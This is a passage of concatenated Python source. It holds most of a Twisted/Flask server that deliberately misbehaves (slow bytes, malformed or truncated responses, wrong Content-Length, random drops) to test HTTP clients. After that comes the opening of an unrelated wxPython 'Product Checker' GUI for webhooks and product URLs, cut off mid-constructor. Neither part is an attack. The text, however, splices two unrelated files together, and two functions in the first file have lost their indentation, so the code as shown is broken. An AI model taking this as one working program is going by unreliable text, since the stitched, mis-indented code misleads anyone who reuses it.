    failure modes are Flask apps wrapped in WSGI resources.
    """
    # in likelihood there is no benefit to passing in the reactor as only one of
    # them can ever run at a time.
    retry_cache = retry_cache or {}
    retries_app = create_retries_app(retry_cache)
    # Wrap each Flask app in a WSGI resource / HammsSite pair so every
    # response gets the Hamms Server header.
    sleep_resource = WSGIResource(reactor, reactor.getThreadPool(), sleep_app)
    sleep_site = HammsSite(sleep_resource)
    status_resource = WSGIResource(reactor, reactor.getThreadPool(), status_app)
    status_site = HammsSite(status_resource)
    large_header_resource = WSGIResource(reactor, reactor.getThreadPool(),
                                         large_header_app)
    large_header_site = HammsSite(large_header_resource)
    retries_resource = WSGIResource(reactor, reactor.getThreadPool(), retries_app)
    retries_site = HammsSite(retries_resource)
    unparseable_resource = WSGIResource(reactor, reactor.getThreadPool(),
                                        unparseable_app)
    unparseable_site = HammsSite(unparseable_resource)
    toolong_content_resource = WSGIResource(reactor, reactor.getThreadPool(),
                                            toolong_content_app)
    toolong_content_site = HammsSite(toolong_content_resource)
    # One listener per failure mode; offsets 1-16 above base_port.
    _reactor.listenTCP(base_port + ListenForeverServer.PORT, ListenForeverFactory())
    _reactor.listenTCP(base_port + EmptyStringTerminateImmediatelyServer.PORT,
                       EmptyStringTerminateImmediatelyFactory())
    _reactor.listenTCP(base_port + EmptyStringTerminateOnReceiveServer.PORT,
                       EmptyStringTerminateOnReceiveFactory())
    _reactor.listenTCP(base_port + MalformedStringTerminateImmediatelyServer.PORT,
                       MalformedStringTerminateImmediatelyFactory())
    _reactor.listenTCP(base_port + MalformedStringTerminateOnReceiveServer.PORT,
                       MalformedStringTerminateOnReceiveFactory())
    _reactor.listenTCP(base_port + FiveSecondByteResponseServer.PORT,
                       FiveSecondByteResponseFactory())
    _reactor.listenTCP(base_port + ThirtySecondByteResponseServer.PORT,
                       ThirtySecondByteResponseFactory())
    _reactor.listenTCP(base_port + sleep_app.PORT, sleep_site)
    _reactor.listenTCP(base_port + status_app.PORT, status_site)
    _reactor.listenTCP(base_port + SendDataPastContentLengthServer.PORT,
                       SendDataPastContentLengthFactory())
    _reactor.listenTCP(base_port + large_header_app.PORT, large_header_site)
    _reactor.listenTCP(base_port + retries_app.PORT, retries_site)
    _reactor.listenTCP(base_port + DropRandomRequestsServer.PORT,
                       DropRandomRequestsFactory())
    _reactor.listenTCP(base_port + unparseable_app.PORT, unparseable_site)
    _reactor.listenTCP(base_port + IncompleteResponseServer.PORT,
                       IncompleteResponseFactory())
    _reactor.listenTCP(base_port + toolong_content_app.PORT, toolong_content_site)
def get_remote_host(transport):
    """Best-effort lookup of the peer's IP for logging; "<ipaddr>" on failure."""
    try:
        return transport.getPeer().host
    except Exception:
        return "<ipaddr>"
def get_port(transport):
    """Best-effort lookup of the local port for logging; "<port>" on failure."""
    try:
        return transport.getHost().port
    except Exception:
        return "<port>"
def get_header(header_name, data):
    """Pull one header out of a raw HTTP request; "" on any parse failure."""
    try:
        _request_line, header_blob = data.split('\r\n', 1)
        parsed_headers = message_from_string(header_blob)
        return parsed_headers.get(header_name, "")
    except Exception:
        return ""
def _log_t(transport, data, status=None):
    """Format a log line for a twisted transport: derive addr/port/UA, delegate."""
    remote_addr = get_remote_host(transport)
    local_port = get_port(transport)
    agent = get_header('user-agent', data)
    return _log(remote_addr, local_port, data, status=status, ua=agent)
def _log(ipaddr, port, data, status=None, ua=""):
try:
topline = data.split('\r\n')[0]
return "{ipaddr} {port} \"{topline}\" {status} \"{ua}\"".format(
ipaddr=ipaddr, port=port, topline=topline, ua=ua, status=status or "-")
except Exception:
logger.exception("caught exception while formatting log")
return "<data received>"
class ListenForeverServer(protocol.Protocol):
    # Accepts data and never replies: simulates a server that blackholes
    # requests until the client times out.
    PORT = 1

    def dataReceived(self, data):
        # Log the request; deliberately send nothing back.
        logger.info(_log_t(self.transport, data))
class ListenForeverFactory(protocol.Factory):
    # One ListenForeverServer per connection.
    def buildProtocol(self, addr):
        return ListenForeverServer()
class EmptyStringTerminateImmediatelyServer(protocol.Protocol):
    # Closes the connection with an empty payload as soon as a client connects.
    PORT = 2

    def dataReceived(self, data):
        logger.info(_log_t(self.transport, data))

    def connectionMade(self):
        # Write nothing, then hang up — before the client even sends a request.
        self.transport.write('')
        self.transport.loseConnection()
class EmptyStringTerminateImmediatelyFactory(protocol.Factory):
    # One EmptyStringTerminateImmediatelyServer per connection.
    def buildProtocol(self, addr):
        return EmptyStringTerminateImmediatelyServer()
class EmptyStringTerminateOnReceiveServer(protocol.Protocol):
    # Waits for the request, then closes with an empty payload.
    PORT = 3

    def dataReceived(self, data):
        logger.info(_log_t(self.transport, data))
        self.transport.write('')
        self.transport.loseConnection()
class EmptyStringTerminateOnReceiveFactory(protocol.Factory):
    # One EmptyStringTerminateOnReceiveServer per connection.
    def buildProtocol(self, addr):
        return EmptyStringTerminateOnReceiveServer()
class MalformedStringTerminateImmediatelyServer(protocol.Protocol):
    # Sends a non-HTTP payload immediately on connect, then hangs up.
    PORT = 4

    def dataReceived(self, data):
        logger.info(_log_t(self.transport, data))

    def connectionMade(self):
        # 'foo bar' is not a valid HTTP response line.
        self.transport.write('foo bar')
        self.transport.loseConnection()
class MalformedStringTerminateImmediatelyFactory(protocol.Factory):
    # One MalformedStringTerminateImmediatelyServer per connection.
    def buildProtocol(self, addr):
        return MalformedStringTerminateImmediatelyServer()
class MalformedStringTerminateOnReceiveServer(protocol.Protocol):
    # Waits for the request, then replies with a non-HTTP payload and hangs up.
    PORT = 5

    def dataReceived(self, data):
        logger.info(_log_t(self.transport, data))
        self.transport.write('foo bar')
        self.transport.loseConnection()
class MalformedStringTerminateOnReceiveFactory(protocol.Factory):
    # One MalformedStringTerminateOnReceiveServer per connection.
    def buildProtocol(self, addr):
        return MalformedStringTerminateOnReceiveServer()
# Canned 204 response dribbled out byte-by-byte by the slow-byte servers below.
empty_response = ('HTTP/1.1 204 No Content\r\n'
                  'Server: {hdr}\r\n\r\n'.format(hdr=SERVER_HEADER))
class FiveSecondByteResponseServer(protocol.Protocol):
    # Dribbles the canned 204 response out one byte every five seconds.
    PORT = 6

    def _send_byte(self, byte):
        self.transport.write(byte)

    def dataReceived(self, data):
        try:
            # Schedule each byte five seconds apart, then close after the
            # final byte has been sent.
            timer = 5
            for byte in empty_response:
                reactor.callLater(timer, self._send_byte, byte)
                timer += 5
            reactor.callLater(timer, self.transport.loseConnection)
            logger.info(_log_t(self.transport, data, status=204))
        except Exception:
            logger.info(_log_t(self.transport, data))
class FiveSecondByteResponseFactory(protocol.Factory):
    # One FiveSecondByteResponseServer per connection.
    def buildProtocol(self, addr):
        return FiveSecondByteResponseServer()
class ThirtySecondByteResponseServer(protocol.Protocol):
    # Dribbles the canned 204 response out one byte every thirty seconds.
    PORT = 7

    def _send_byte(self, byte):
        self.transport.write(byte)

    def dataReceived(self, data):
        try:
            # Schedule each byte thirty seconds apart, then close after the
            # final byte has been sent.
            timer = 30
            for byte in empty_response:
                reactor.callLater(timer, self._send_byte, byte)
                timer += 30
            reactor.callLater(timer, self.transport.loseConnection)
            logger.info(_log_t(self.transport, data, status=204))
        except Exception:
            logger.info(_log_t(self.transport, data))
class ThirtySecondByteResponseFactory(protocol.Factory):
    # One ThirtySecondByteResponseServer per connection.
    def buildProtocol(self, addr):
        return ThirtySecondByteResponseServer()
class SendDataPastContentLengthServer(protocol.Protocol):
    # Declares Content-Length: 3 but sends a 1 MB body, immediately on connect.
    PORT = 10

    def dataReceived(self, data):
        logger.info(_log_t(self.transport, data, status=200))

    def connectionMade(self):
        # Respond before any request is even read.
        self.transport.write('HTTP/1.1 200 OK\r\n'
                             'Server: {server}\r\n'
                             'Content-Type: text/plain\r\n'
                             'Content-Length: 3\r\n'
                             'Connection: keep-alive\r\n'
                             '\r\n{body}'.format(server=SERVER_HEADER,
                                                 body='a'*1024*1024))
        self.transport.loseConnection()
class SendDataPastContentLengthFactory(protocol.Factory):
    # One SendDataPastContentLengthServer per connection.
    def buildProtocol(self, addr):
        return SendDataPastContentLengthServer()
def success_response(content_type, response):
    """Render a minimal, well-formed HTTP 200 reply with the given body."""
    template = ('HTTP/1.1 200 OK\r\n'
                'Server: {server}\r\n'
                'Content-Type: {ctype}\r\n\r\n'
                '{response}')
    return template.format(server=SERVER_HEADER, ctype=content_type,
                           response=response)
class DropRandomRequestsServer(protocol.Protocol):
    """Randomly drops connections instead of answering.

    The drop probability defaults to 0.05 and can be overridden with a
    ``failrate`` query parameter on the request URL. Successful requests
    get a small JSON 200 body.
    """
    PORT = 13

    def dataReceived(self, data):
        body = data.split('\r\n')
        try:
            method, url, http_vsn = body[0].split(' ')
        except Exception:
            # we got weird data, just fail
            logger.info(_log_t(self.transport, data))
            self.transport.loseConnection()
            # BUG FIX: previously fell through here and raised NameError on
            # the unbound `url` below; stop handling this request instead.
            return
        o = urlparse.urlparse(url)
        query = urlparse.parse_qs(o.query)
        if 'failrate' in query:
            # parse_qs values are lists; take the (single) supplied value.
            failrate = query['failrate'].pop()
        else:
            failrate = 0.05
        if random.random() >= float(failrate):
            logger.info(_log_t(self.transport, data, status=200))
            self.transport.write(
                success_response('application/json', '{"success": true}'))
        else:
            # Drop: log with no status and sever the connection.
            logger.info(_log_t(self.transport, data))
            self.transport.loseConnection()
class DropRandomRequestsFactory(protocol.Factory):
    # One DropRandomRequestsServer per connection.
    def buildProtocol(self, addr):
        return DropRandomRequestsServer()
def write_incomplete_response(transport, content_type, body):
    """Send headers advertising 2000 more bytes than *body* holds, then hang up.

    Clients see a well-formed header block followed by a truncated entity.
    """
    declared_length = len(body) + 2000
    transport.write('Content-Type: {ctype}\r\n'.format(ctype=content_type))
    transport.write('Content-Length: {length}\r\n'.format(length=declared_length))
    transport.write('\r\n{body}'.format(body=body))
    transport.loseConnection()
# Deliberately truncated documents served by the incomplete / too-long apps.
INCOMPLETE_JSON = '{"message": "the json body is incomplete.", "key": {"nested_message": "blah blah blah'
INCOMPLETE_XML = '<?xml version="1.0" ?><response><status type="http">200 foo'
INCOMPLETE_PLAIN = 'incomplete document respo'
INCOMPLETE_HTML = '<!doctype html><html><head><title>incomplete'
class IncompleteResponseServer(protocol.Protocol):
    # Answers 200 with a body truncated mid-document, matching the client's
    # preferred content type from its Accept header.
    PORT = 16

    def dataReceived(self, data):
        accept_header_value = get_header('Accept', data)
        accept_cls = parse_accept_header(accept_header_value)
        self.transport.write('HTTP/1.1 200 OK\r\n')
        # Remaining headers + truncated body come from the shared helper.
        if 'text/html' == accept_cls.best:
            write_incomplete_response(self.transport, 'text/html',
                                      INCOMPLETE_HTML)
        elif 'text/plain' == accept_cls.best:
            write_incomplete_response(self.transport, 'text/plain',
                                      INCOMPLETE_PLAIN)
        elif 'text/xml' == accept_cls.best:
            write_incomplete_response(self.transport, 'text/xml',
                                      INCOMPLETE_XML)
        else:
            # JSON is the fallback for */* and anything unrecognized.
            write_incomplete_response(self.transport, 'application/json',
                                      INCOMPLETE_JSON)
class IncompleteResponseFactory(protocol.Factory):
    # One IncompleteResponseServer per connection.
    def buildProtocol(self, addr):
        return IncompleteResponseServer()
# One Flask app per HTTP-level failure mode. PORT is the offset added to
# base_port when the sites are bound in listen().
sleep_app = Flask(__name__)
sleep_app.PORT = 8
status_app = Flask(__name__)
status_app.PORT = 9
large_header_app = Flask(__name__)
large_header_app.PORT = 11
unparseable_app = Flask(__name__)
unparseable_app.PORT = 14
toolong_content_app = Flask(__name__)
toolong_content_app.PORT = 15
def create_retries_app(cache):
    """Build the Flask app (port offset 12) that fails until retried enough.

    Each key starts with ``tries`` attempts (default 3). Requests for a key
    return 500 until its counter reaches zero, then 200. *cache* maps
    key -> remaining tries and is shared with the caller so it can be
    inspected or reset externally.
    """
    retries_app = Flask(__name__)
    retries_app.PORT = 12
    retries_app.cache = cache

    # BUG FIX: json_hdr used to be local to check_retries(), so the error
    # path in reset() raised a NameError. Define it once for both views.
    json_hdr = {'Content-Type': 'application/json'}

    # we want the retries app to listen on all methods
    retries_app.url_map.add(Rule('/', endpoint='index'))

    @retries_app.endpoint("index")
    def check_retries():
        # Decrement the counter for `key`; 500 while positive, 200 at zero.
        key = request.args.get('key', 'default')
        tries = request.args.get('tries', 3)
        try:
            tries = int(tries)
        except Exception:
            return Response(status=400, headers=json_hdr, response=json.dumps({
                'error': 'Please pass an integer number of tries',
                'key': key,
                'success': False,
            }))
        if key in retries_app.cache:
            retries_app.cache[key] -= 1
        else:
            # First request for this key consumes one try immediately.
            retries_app.cache[key] = int(tries) - 1
        if retries_app.cache[key] <= 0:
            data = {
                'key': key,
                'tries_remaining': retries_app.cache[key],
                'success': True
            }
            return Response(response=json.dumps(data), status=200,
                            headers=json_hdr)
        else:
            msg = 'The server had an error. Try again {retry_times} more {time_p}'
            time_p = 'time' if retries_app.cache[key] == 1 else 'times'
            content = {
                'error': msg.format(retry_times=retries_app.cache[key], time_p=time_p),
                'tries_remaining': retries_app.cache[key],
                'key': key,
                'success': False,
            }
            return Response(response=json.dumps(content), status=500,
                            headers=json_hdr)

    @retries_app.route("/counters", methods=['POST'])
    def reset():
        # Reset (or create) the counter for `key` to `tries`.
        key = request.values.get('key', 'default')
        tries = request.values.get('tries', 3)
        try:
            tries = int(tries)
        except Exception:
            # Previously crashed here with NameError because json_hdr was
            # only defined inside check_retries().
            return Response(status=400, headers=json_hdr, response=json.dumps({
                'error': 'Please pass an integer number of tries',
                'key': key,
                'success': False,
            }))
        retries_app.cache[key] = tries
        content = {
            'key': key,
            'tries_remaining': tries,
            'success': True,
        }
        return Response(response=json.dumps(content), status=200,
                        headers={'Content-Type': 'application/json'})

    @retries_app.route("/counters", methods=['GET'])
    def counter():
        # Dump every counter for external inspection.
        content = {'counters': retries_app.cache, 'success': True}
        return Response(response=json.dumps(content), status=200,
                        headers={'Content-Type': 'application/json'})

    @retries_app.after_request
    def retries_header(resp):
        # Access-log line plus the hamms Server header on every response.
        _log_flask(resp.status_code)
        resp.headers['Server'] = 'hamms'
        return resp

    return retries_app
@sleep_app.route("/")
def sleep():
    # Sleep `sleep` seconds (default 5) before answering, then echo the
    # request headers back as JSON.
    n = request.values.get('sleep', 5)
    time.sleep(float(n))
    hdrs = get_dict('headers')
    return Response(response=json.dumps(hdrs), status=200,
                    headers={'Content-Type': 'application/json'})
@status_app.route("/")
def status():
    # Return whatever HTTP status code the client asks for (default 200).
    n = request.values.get('status', 200)
    return status_code(int(n))
@large_header_app.route("/")
def large_header():
    # Respond with an absurdly large Cookie header (`size` bytes, default 63 KB).
    n = request.values.get('size', 63*1024)
    req_headers = get_dict('headers')
    resp_headers = {
        'Content-Type': 'application/json',
        'Cookie': 'a'*int(n)
    }
    return Response(response=json.dumps(req_headers), status=200,
                    headers=resp_headers)
@unparseable_app.route("/")
def unparseable():
    # Deliberately answer with a content type the client did NOT ask for.
    def _morse():
        # Morse-encoded plea, served as the made-up text/morse type.
        hdr = {'Content-Type': 'text/morse'}
        message = " STOP ".join([
            "DEAREST ANN",
            "TIMES ARE HARD",
            "MY TREADMILL DESK DOESNT RECLINE ALL THE WAY",
            "THE KITCHEN HASNT HAD SOYLENT FOR TWO WHOLE DAYS",
            "HOW IS ANYONE SUPPOSED TO PROGRAM IN THESE CONDITIONS",
            "PLEASE SEND HELP",
        ]) + " STOP"
        morse_message = StringIO()
        for i, letter in enumerate(message):
            morse_message.write(morsedict[letter])
        return Response(response=morse_message.getvalue(), headers=hdr)
    # Each branch checks what the client accepts and serves something else.
    if 'text/morse' not in request.accept_mimetypes:
        return _morse()
    elif not request.accept_mimetypes.accept_json:
        hdr = {'Content-Type': 'application/json'}
        resp = {
            'status': 200,
            'message': 'This is a JSON response. You did not ask for JSON data.',
        }
        return Response(response=json.dumps(resp), headers=hdr)
    elif not request.accept_mimetypes.accept_html:
        hdr = {'Content-Type': 'text/html'}
        return Response(response="<!doctype html><html><head><title>Your API is Broken</title></head><body>This should be JSON.</body></html>", headers=hdr)
    elif 'text/csv' not in request.accept_mimetypes:
        hdr = {'Content-Type': 'text/csv'}
        return Response(response="message,status\nThis is a CSV response that your code almost certainly can't parse", headers=hdr)
    else:
        # */* or similar, return morse.
        return _morse()
@toolong_content_app.route("/")
def toolong():
    # Advertise Content-Length 2300 but send a much shorter truncated body,
    # matched to whatever content type the client prefers.
    r = Response()
    # Stop Flask from correcting the deliberately-wrong Content-Length.
    r.automatically_set_content_length = False
    r.headers['Content-Length'] = 2300
    if (request.accept_mimetypes.best == 'application/json' or
            request.accept_mimetypes.best == '*/*'):
        r.headers['Content-Type'] = 'application/json'
        r.set_data(INCOMPLETE_JSON)
    elif request.accept_mimetypes.best == 'text/html':
        r.headers['Content-Type'] = 'text/html'
        r.set_data(INCOMPLETE_HTML)
    elif request.accept_mimetypes.best == 'text/plain':
        r.headers['Content-Type'] = 'text/plain'
        r.set_data(INCOMPLETE_PLAIN)
    elif (request.accept_mimetypes.best == 'text/xml' or
            request.accept_mimetypes.best == 'application/xml'):
        r.headers['Content-Type'] = 'text/xml'
        r.set_data(INCOMPLETE_XML)
    else:
        # Fallback mirrors the JSON branch.
        r.headers['Content-Type'] = 'application/json'
        r.set_data(INCOMPLETE_JSON)
    return r
def _get_port_from_url(url):
urlo = urlparse.urlparse(url)
try:
host, port = urlo.netloc.split(':')
return port
except Exception:
return "<port>"
def _log_flask(status):
    # Emit an access-log line for the current Flask request, mirroring the
    # format used by the raw-socket servers (_log_t).
    port = _get_port_from_url(request.url)
    url_line = "{method} {url} HTTP/1.0".format(
        method=request.method.upper(), url=request.full_path)
    ua = request.headers.get('user-agent', '')
    logger.info(_log(request.remote_addr, port, url_line, status, ua=ua))
@sleep_app.after_request
def log_sleep(resp):
    # Access-log every sleep_app response.
    _log_flask(resp.status_code)
    return resp
@status_app.after_request
def log_status(resp):
    # Access-log every status_app response.
    _log_flask(resp.status_code)
    return resp
@large_header_app.after_request
def log_large_header(resp):
    # Access-log every large_header_app response.
    _log_flask(resp.status_code)
    return resp
def main(port=BASE_PORT):
    # Run every misbehaving server in the foreground (blocks on the reactor).
    logging.basicConfig()
    logger.info("Listening...")
    listen(reactor, port)
    reactor.run()


if __name__ == "__main__":
    main()
|
gui.py |
# -*- coding: utf-8 -*-
import wx
import wx.xrc
import json
import requests
import time
from datetime import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
from threading import Thread
from selenium import webdriver
from chromedriver_py import binary_path as driver_path
from lxml import html
# Set maxprice to 0 for the default (any price); set it to a plain number,
# e.g. 300 with no quotes, to ignore listings priced above that amount.
# Only applies to Walmart URLs for right now.
#maxprice = 300
maxprice = 0
###########################################################################
## Class WebhookManager
###########################################################################
# TODO refactor all of this
class WebhookManager ( wx.Frame ):
    """Frame for creating, updating, deleting and clearing webhook entries.

    Entries persist in ./data/webhooks.json as {name: url}. Relies on the
    module-level `webhookListChoices` list being populated (by
    GUI.OnManageWebhooks) before this frame is constructed.
    """

    def __init__( self, parent ):
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Manage Webhooks", pos = wx.DefaultPosition, size = wx.Size( 354,199 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
        self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
        outer = wx.BoxSizer( wx.VERTICAL )
        self.panel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        box = wx.BoxSizer( wx.HORIZONTAL )
        # Left-hand column of action buttons.
        self.btnPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        btnbox = wx.BoxSizer( wx.VERTICAL )
        self.newBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"New", wx.DefaultPosition, wx.DefaultSize, 0 )
        btnbox.Add( self.newBtn, 0, wx.ALL, 5 )
        self.renBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Update", wx.DefaultPosition, wx.DefaultSize, 0 )
        btnbox.Add( self.renBtn, 0, wx.ALL, 5 )
        self.delBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Delete", wx.DefaultPosition, wx.DefaultSize, 0 )
        btnbox.Add( self.delBtn, 0, wx.ALL, 5 )
        self.clrBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Clear All", wx.DefaultPosition, wx.DefaultSize, 0 )
        btnbox.Add( self.clrBtn, 0, wx.ALL, 5 )
        self.btnPanel.SetSizer( btnbox )
        self.btnPanel.Layout()
        btnbox.Fit( self.btnPanel )
        box.Add( self.btnPanel, 0, wx.EXPAND |wx.ALL, 5 )
        # Right-hand list of configured webhook names.
        self.listPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        lstbox = wx.BoxSizer( wx.VERTICAL )
        #webhookListChoices = []
        # NOTE(review): webhookListChoices is a module global set by
        # GUI.OnManageWebhooks — constructing this frame before that runs
        # would raise a NameError.
        self.webhookList = wx.ListBox( self.listPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, webhookListChoices, 0 )
        lstbox.Add( self.webhookList, 1, wx.ALL|wx.EXPAND, 5 )
        self.listPanel.SetSizer( lstbox )
        self.listPanel.Layout()
        lstbox.Fit( self.listPanel )
        box.Add( self.listPanel, 1, wx.EXPAND |wx.ALL, 5 )
        self.panel.SetSizer( box )
        self.panel.Layout()
        box.Fit( self.panel )
        outer.Add( self.panel, 1, wx.EXPAND, 5 )
        self.SetSizer( outer )
        self.Layout()
        self.Centre( wx.BOTH )
        # Connect Events
        self.newBtn.Bind( wx.EVT_BUTTON, self.NewItem )
        self.renBtn.Bind( wx.EVT_BUTTON, self.OnUpdate )
        self.delBtn.Bind( wx.EVT_BUTTON, self.OnDelete )
        self.clrBtn.Bind( wx.EVT_BUTTON, self.OnClear )

    def __del__( self ):
        pass

    def NewItem(self, event):
        # Prompt for a URL and a friendly name; persist and display the entry.
        webhook_dict = return_data("./data/webhooks.json")
        webhook_url = wx.GetTextFromUser('Enter a Webhook URL', 'Insert dialog')
        if webhook_url != '':
            webhook_name = wx.GetTextFromUser('Give the webhook URL a friendly name', 'Insert dialog')
            self.webhookList.Append(webhook_name)
            set_data("./data/webhooks.json", webhook_name, webhook_url)
            webhook_dict = return_data("./data/webhooks.json")
            webhookListChoices.append(webhook_name)

    def OnUpdate(self, event):
        # Replace the URL of the selected entry, keeping its name.
        webhook_dict = return_data("./data/webhooks.json")
        sel = self.webhookList.GetSelection()
        text = self.webhookList.GetString(sel)
        webhook_to_modify = webhook_dict[text]
        modified_webhook_url = wx.GetTextFromUser('Update item', 'Update Item dialog', webhook_to_modify)
        if modified_webhook_url != '':
            webhook_dict.update({text: modified_webhook_url})
            set_data("./data/webhooks.json", text, modified_webhook_url)
            webhook_dict = return_data("./data/webhooks.json")
            #self.webhookList.Delete(sel)
            #item_id = self.webhookList.Insert(renamed, sel)
            #self.webhookList.SetSelection(item_id)

    def OnDelete(self, event):
        # Remove the selected entry from the list box and the JSON file.
        webhook_dict = return_data("./data/webhooks.json")
        sel = self.webhookList.GetSelection()
        text = self.webhookList.GetString(sel)
        if sel != -1:
            self.webhookList.Delete(sel)
            del webhook_dict[text]
            with open("./data/webhooks.json", "w") as file:
                json.dump(webhook_dict, file)
                file.close()
            webhook_dict = return_data("./data/webhooks.json")

    def OnClear(self, event):
        # Empty the list box and truncate the JSON file to {}.
        self.webhookList.Clear()
        with open("./data/webhooks.json", "w") as file:
            json.dump({}, file)
            file.close()
        webhook_dict = return_data("./data/webhooks.json")
###########################################################################
## Class WebhookDialog
###########################################################################
class WebhookDialog ( wx.Dialog ):
    """Modal dialog assigning a saved webhook to the focused product row."""

    def __init__( self, parent ):
        wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Assign Webhook", pos = wx.DefaultPosition, size = wx.Size( 201,103 ), style = wx.DEFAULT_DIALOG_STYLE )
        self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
        vbox = wx.BoxSizer( wx.VERTICAL )
        self.pnl = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        vbox.Add( self.pnl, 1, wx.EXPAND |wx.ALL, 5 )
        comboChoices = []
        self.combo = wx.ComboBox( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, comboChoices, 0 )
        vbox.Add( self.combo, 0, wx.ALL|wx.EXPAND, 5 )
        self.okButton = wx.Button( self, wx.ID_ANY, u"Okay", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox.Add( self.okButton, 0, wx.ALL|wx.EXPAND, 5 )
        self.SetSizer( vbox )
        self.Layout()
        self.Centre( wx.BOTH )
        # Connect Events
        self.okButton.Bind( wx.EVT_BUTTON, self.update )
        # Populate the combo box with every saved webhook name.
        webhook_dict = return_data("./data/webhooks.json")
        for k in webhook_dict:
            self.combo.Append(k)

    def update(self, e):
        # Apply the chosen webhook to the product row focused in the main GUI
        # (`ex` is the module-global GUI instance), then close the dialog.
        try:
            selected = ex.list.GetFocusedItem()
            i = selected
            url = ex.list.GetItemText(i, col=0)
            new_webhook_key = self.combo.GetSelection()
            new_webhook = self.combo.GetString(new_webhook_key)
            if new_webhook != "":
                print(url, new_webhook)
                urldict.update({url: new_webhook})
                set_data("./data/products.json", url, new_webhook)
                ex.list.SetItem(i, 1, new_webhook)
                num = ex.list.GetItemCount()
            else:
                print("select a webhook first")
        except:
            print("An error ocurred. Did you select a URL before clicking Edit?")
            self.Close()
        self.Close()

    def OnClose(self, e):
        self.Destroy()

    def __del__( self ):
        pass
###########################################################################
## Class GUI
###########################################################################
class GUI ( wx.Frame ):
    """Main window: product list, activity log and job-control buttons.

    The module-level `ex` global refers to the single instance of this
    frame; worker code and dialogs reach back into it through `ex`.
    """

    def __init__( self, parent ):
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Product Checker", pos = wx.DefaultPosition, size = wx.Size( 1009,660 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
        self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
        hbox = wx.BoxSizer( wx.HORIZONTAL )
        # Left column: logo plus the action buttons.
        self.leftPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        vbox2 = wx.BoxSizer( wx.VERTICAL )
        self.icon = wx.StaticBitmap( self.leftPanel, wx.ID_ANY, wx.Bitmap( u"img/icon.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.icon, 0, wx.ALL|wx.EXPAND, 15 )
        self.whBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Manage Webhooks", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.whBtn, 0, wx.ALL|wx.EXPAND, 5 )
        self.addBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Add Product URL", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.addBtn, 0, wx.ALL|wx.EXPAND, 5 )
        self.editBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Edit Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.editBtn, 0, wx.ALL|wx.EXPAND, 5 )
        self.delBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Delete Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.delBtn, 0, wx.ALL|wx.EXPAND, 5 )
        self.strtAllBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"START All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.strtAllBtn, 0, wx.ALL|wx.EXPAND, 5 )
        self.app2Btn = wx.Button( self.leftPanel, wx.ID_ANY, u"STOP All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
        vbox2.Add( self.app2Btn, 0, wx.ALL|wx.EXPAND, 5 )
        vbox2.Add( ( 0, 0), 1, wx.EXPAND, 5 )
        self.leftPanel.SetSizer( vbox2 )
        self.leftPanel.Layout()
        vbox2.Fit( self.leftPanel )
        hbox.Add( self.leftPanel, 0, wx.EXPAND, 5 )
        # Right column: product list (URL / webhook / status) and the log box.
        self.rightPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        vbox = wx.BoxSizer( wx.VERTICAL )
        self.list = wx.ListCtrl( self.rightPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT )
        vbox.Add( self.list, 1, wx.ALL|wx.EXPAND, 5 )
        self.log = wx.TextCtrl( self.rightPanel, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( -1,200 ), wx.TE_MULTILINE|wx.TE_READONLY )
        vbox.Add( self.log, 0, wx.ALL|wx.EXPAND, 5 )
        self.rightPanel.SetSizer( vbox )
        self.rightPanel.Layout()
        vbox.Fit( self.rightPanel )
        hbox.Add( self.rightPanel, 1, wx.EXPAND, 5 )
        self.SetSizer( hbox )
        self.Layout()
        # Status bar and File/Help menus.
        self.statusBar = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )
        self.m_menubar1 = wx.MenuBar( 0 )
        self.menuFile = wx.Menu()
        self.exitItem = wx.MenuItem( self.menuFile, wx.ID_ANY, u"Exit", wx.EmptyString, wx.ITEM_NORMAL )
        self.menuFile.Append( self.exitItem )
        self.m_menubar1.Append( self.menuFile, u"File" )
        self.menuHelp = wx.Menu()
        self.m_menubar1.Append( self.menuHelp, u"Help" )
        self.SetMenuBar( self.m_menubar1 )
        self.Centre( wx.BOTH )
        # Connect Events
